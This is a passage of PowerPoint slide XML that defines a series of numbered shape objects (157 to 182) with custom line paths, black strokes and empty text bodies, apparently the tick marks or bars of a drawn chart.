            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="21372">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="object 157"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2825001" y="5689405"/>
            <a:ext cx="1258" cy="44042"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="22225">
                <a:moveTo>
                  <a:pt x="546" y="21394"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="21394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21670"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="object 158"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2852855" y="5707412"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25155">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="object 159"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2850676" y="5680267"/>
            <a:ext cx="2517" cy="52851"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="26669">
                <a:moveTo>
                  <a:pt x="0" y="26005"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="26281"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="object 160"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2880761" y="5708753"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="23802">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="object 161"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2880760" y="5687056"/>
            <a:ext cx="0" cy="45301"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="22860">
                <a:moveTo>
                  <a:pt x="-2706" y="11427"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="11427"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="22855">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="object 162"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2908666" y="5710350"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="22200">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="object 163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2908665" y="5688601"/>
            <a:ext cx="2517" cy="44042"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="22225">
                <a:moveTo>
                  <a:pt x="1098" y="21799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1098" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="21799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22075"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="object 164"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2936519" y="5707138"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25431">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="object 165"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2935437" y="5679977"/>
            <a:ext cx="1258" cy="52851"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="26669">
                <a:moveTo>
                  <a:pt x="0" y="26151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="26427"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="object 166"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2963879" y="5706330"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="26259">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="object 167"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2963878" y="5679218"/>
            <a:ext cx="2517" cy="54109"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="27305">
                <a:moveTo>
                  <a:pt x="698" y="26535"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="26535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26811"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="object 168"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991785" y="5705262"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="27336">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="object 169"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2989853" y="5678176"/>
            <a:ext cx="2517" cy="55367"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="27939">
                <a:moveTo>
                  <a:pt x="0" y="27060"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="27336"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="object 170"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3019637" y="5704195"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28413">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="object 171"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3019637" y="5677083"/>
            <a:ext cx="1258" cy="55367"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="27939">
                <a:moveTo>
                  <a:pt x="151" y="27612"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="151" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="27612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27888"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="object 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047545" y="5703648"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28965">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="object 173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047543" y="5676578"/>
            <a:ext cx="2517" cy="56626"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="28575">
                <a:moveTo>
                  <a:pt x="1244" y="27866"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="27866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28142"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="object 174"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3075397" y="5701514"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="31119">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="object 175"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3074602" y="5668995"/>
            <a:ext cx="1258" cy="64174"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="32385">
                <a:moveTo>
                  <a:pt x="0" y="31693"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="31969"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="object 176"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3103302" y="5697755"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="34902">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="object 177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3103301" y="5665317"/>
            <a:ext cx="2517" cy="67951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="34289">
                <a:moveTo>
                  <a:pt x="698" y="33549"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="33549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33825"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="object 178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3130661" y="5697755"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="34902">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="object 179"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3129019" y="5665317"/>
            <a:ext cx="2517" cy="67951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="34289">
                <a:moveTo>
                  <a:pt x="0" y="33549"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="33825"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="object 180"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3158515" y="5690243"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="42495">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="object 181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3158515" y="5647042"/>
            <a:ext cx="1258" cy="85568"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="43180">
                <a:moveTo>
                  <a:pt x="276" y="42771"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276" y="42771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="43047"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="object 182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3186421" y="5688901"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
